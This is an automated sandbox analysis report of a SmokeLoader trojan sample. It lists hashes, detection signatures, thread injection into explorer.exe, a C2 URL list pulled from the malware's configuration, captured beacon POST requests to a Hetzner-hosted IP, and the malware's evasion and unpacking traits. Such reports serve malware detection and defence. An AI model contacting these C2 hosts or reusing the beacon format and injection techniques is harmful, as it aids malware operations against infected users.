Edit tour

Windows Analysis Report
br0A8E2X6I.exe

Overview

General Information

Sample name:	br0A8E2X6I.exe renamed because original name is a hash value
Original sample name:	cb9d1ebc73719f1434f92e6648b4815c01dadef4761f7cc4e91561ce34da6346.exe
Analysis ID:	1496330
MD5:	64b4ac441e96d0fca88fb2a62cc170b0
SHA1:	5d111704bfb4a26778bc5bf7f9e13cda1a53a767
SHA256:	cb9d1ebc73719f1434f92e6648b4815c01dadef4761f7cc4e91561ce34da6346
Tags:	45-66-231-202exeSocks5Systemz
Infos:

Detection

SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected SmokeLoader

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Switches to a custom stack to bypass stack traces

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

br0A8E2X6I.exe (PID: 5604 cmdline: "C:\Users\user\Desktop\br0A8E2X6I.exe" MD5: 64B4AC441E96D0FCA88FB2A62CC170B0)

explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2097598650.0000000000510000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2097598650.0000000000510000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.2097560647.00000000004F0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2097732029.00000000005EE000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x6c1a:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.2097653376.0000000000541000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.2097653376.0000000000541000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2a4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
Click to see the 3 entries

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 188.40.141.211

Timestamp:	2024-08-21T07:11:30.506045+0200
SID:	2039103
Severity:	1
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.5 - Destination IP: 188.40.141.211

Timestamp:	2024-08-21T07:11:30.260968+0200
SID:	2039103
Severity:	1
Source Port:	49711
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: br0A8E2X6I.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://goodfooggooftool.net/index.php	Avira URL Cloud: Label: malware
Source: http://valarioulinity1.net/index.php	Avira URL Cloud: Label: malware
Source: http://cassiosssionunu.me/index.php	Avira URL Cloud: Label: malware
Source: http://vacantion18ffeu.cc/index.php	Avira URL Cloud: Label: malware
Source: http://selebration17io.io/index.php	Avira URL Cloud: Label: phishing
Source: http://sulugilioiu19.net/index.php	Avira URL Cloud: Label: malware
Source: http://buriatiarutuhuob.net/index.php	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\rdihhcd

Avira: detection malicious, Label: HEUR/AGEN.1307711

Found malware configuration

Source: 00000000.00000002.2097598650.0000000000510000.00000004.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://goodfooggooftool.net/index.php", "http://sulugilioiu19.net/index.php", "http://selebration17io.io/index.php", "http://vacantion18ffeu.cc/index.php", "http://valarioulinity1.net/index.php", "http://buriatiarutuhuob.net/index.php", "http://cassiosssionunu.me/index.php"]}

Multi AV Scanner detection for domain / URL

Source: selebration17io.io	Virustotal: Detection: 16%	Perma Link
Source: http://goodfooggooftool.net/index.php	Virustotal: Detection: 15%	Perma Link
Source: http://valarioulinity1.net/index.php	Virustotal: Detection: 14%	Perma Link
Source: http://selebration17io.io/index.php	Virustotal: Detection: 14%	Perma Link
Source: http://cassiosssionunu.me/index.php	Virustotal: Detection: 13%	Perma Link
Source: http://buriatiarutuhuob.net/index.php	Virustotal: Detection: 15%	Perma Link
Source: http://vacantion18ffeu.cc/index.php	Virustotal: Detection: 21%	Perma Link
Source: http://sulugilioiu19.net/index.php	Virustotal: Detection: 13%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\rdihhcd	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Roaming\rdihhcd	Virustotal: Detection: 74%			Perma Link

Multi AV Scanner detection for submitted file

Source: br0A8E2X6I.exe	ReversingLabs: Detection: 76%
Source: br0A8E2X6I.exe	Virustotal: Detection: 74%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\rdihhcd

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: br0A8E2X6I.exe

Joe Sandbox ML: detected

Source: br0A8E2X6I.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\br0A8E2X6I.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\giz59_mugeheta\bufemadubicuk99\tij-dulinunif87\kabe.pdb source: br0A8E2X6I.exe, rdihhcd.2.dr
Source:	Binary string: 4gFC:\giz59_mugeheta\bufemadubicuk99\tij-dulinunif87\kabe.pdb source: br0A8E2X6I.exe, rdihhcd.2.dr

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.5:49711 -> 188.40.141.211:80

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe

Network Connect: 188.40.141.211 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://goodfooggooftool.net/index.php
Source: Malware configuration extractor	URLs: http://sulugilioiu19.net/index.php
Source: Malware configuration extractor	URLs: http://selebration17io.io/index.php
Source: Malware configuration extractor	URLs: http://vacantion18ffeu.cc/index.php
Source: Malware configuration extractor	URLs: http://valarioulinity1.net/index.php
Source: Malware configuration extractor	URLs: http://buriatiarutuhuob.net/index.php
Source: Malware configuration extractor	URLs: http://cassiosssionunu.me/index.php

Source: Joe Sandbox View

IP Address: 188.40.141.211 188.40.141.211

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jynwoplqqkht.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: selebration17io.io
Source: global traffic	HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://smiodprqlvtv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: selebration17io.io

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: selebration17io.io

Source: unknown

HTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jynwoplqqkht.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: selebration17io.io

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 05:11:30 GMTData Raw: 03 00 00 00 1f 3d 19 Data Ascii: =
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 05:11:30 GMT

Source: explorer.exe, 00000002.00000002.3272482280.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.2075690937.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3268026747.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.v
Source: explorer.exe, 00000002.00000002.3272482280.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000002.3272482280.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000002.3272482280.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000002.3272482280.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.00000000099BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2077924540.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2078364506.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2078340556.0000000008870000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000002.3268274578.00000000011A0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://selebration17io.io/index.php
Source: explorer.exe, 00000002.00000003.3096930645.0000000003534000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095948833.0000000003531000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://smiodprqlvtv.net/
Source: explorer.exe, 00000002.00000003.3096930645.0000000003534000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3095948833.0000000003531000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://smiodprqlvtv.net/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 00000002.00000002.3275682540.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081841615.000000000C81C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000003.3095522768.000000000C547000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094758629.000000000C514000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081353082.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3275303144.000000000C518000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000003.3095264105.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3270338419.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2077257852.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000003.3096144958.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000002.3270338419.0000000007637000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2077257852.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000003.3094228937.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2076341879.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3269123884.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 00000002.00000000.2078773166.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2078773166.0000000009BB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3272482280.0000000009D42000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.0000000009D42000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000002.3275032244.000000000C460000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2081353082.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000002.00000002.3272482280.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.00000000099BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000002.3272482280.00000000099B0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3096144958.00000000099BF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2078773166.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2097598650.0000000000510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2097653376.0000000000541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2097598650.0000000000510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2097560647.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2097732029.00000000005EE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2097653376.0000000000541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_00401553 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401553
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_00403005 RtlCreateUserThread,NtTerminateProcess,	0_2_00403005
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_00401561 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401561
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_0040156B NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040156B
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_0040156F NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040156F
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_00401729 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401729
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_004023E5 NtQuerySystemInformation,	0_2_004023E5
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_00401583 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401583
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_00401587 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401587
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_004026A0 NtEnumerateKey,	0_2_004026A0

Source: C:\Windows\explorer.exe

Code function: 2_2_01122968

2_2_01122968

Source: br0A8E2X6I.exe, 00000000.00000002.2097489854.0000000000442000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWonder4 vs br0A8E2X6I.exe
Source: br0A8E2X6I.exe	Binary or memory string: OriginalFilenameWonder4 vs br0A8E2X6I.exe

Source: br0A8E2X6I.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2097598650.0000000000510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000002.00000002.3268206888.0000000001121000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2097560647.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2097732029.00000000005EE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2097653376.0000000000541000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23

Source: br0A8E2X6I.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: rdihhcd.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/2@1/1

Source: C:\Users\user\Desktop\br0A8E2X6I.exe

Code function: 0_2_005F4C48 CreateToolhelp32Snapshot,Module32First,

0_2_005F4C48

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\rdihhcd

Jump to behavior

Source: br0A8E2X6I.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\br0A8E2X6I.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: br0A8E2X6I.exe	ReversingLabs: Detection: 76%
Source: br0A8E2X6I.exe	Virustotal: Detection: 74%

Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32

Jump to behavior

Source: C:\Windows\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office

Jump to behavior

Source: C:\Users\user\Desktop\br0A8E2X6I.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: br0A8E2X6I.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\giz59_mugeheta\bufemadubicuk99\tij-dulinunif87\kabe.pdb source: br0A8E2X6I.exe, rdihhcd.2.dr
Source:	Binary string: 4gFC:\giz59_mugeheta\bufemadubicuk99\tij-dulinunif87\kabe.pdb source: br0A8E2X6I.exe, rdihhcd.2.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\br0A8E2X6I.exe

Unpacked PE file: 0.2.br0A8E2X6I.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_00403253 push eax; ret	0_2_0040332D
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_00401C64 push es; retf	0_2_00401C83
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_00403335 push eax; ret	0_2_0040332D
Source: C:\Users\user\Desktop\br0A8E2X6I.exe	Code function: 0_2_00402F91 push 60B44389h; retf	0_2_00402FAB
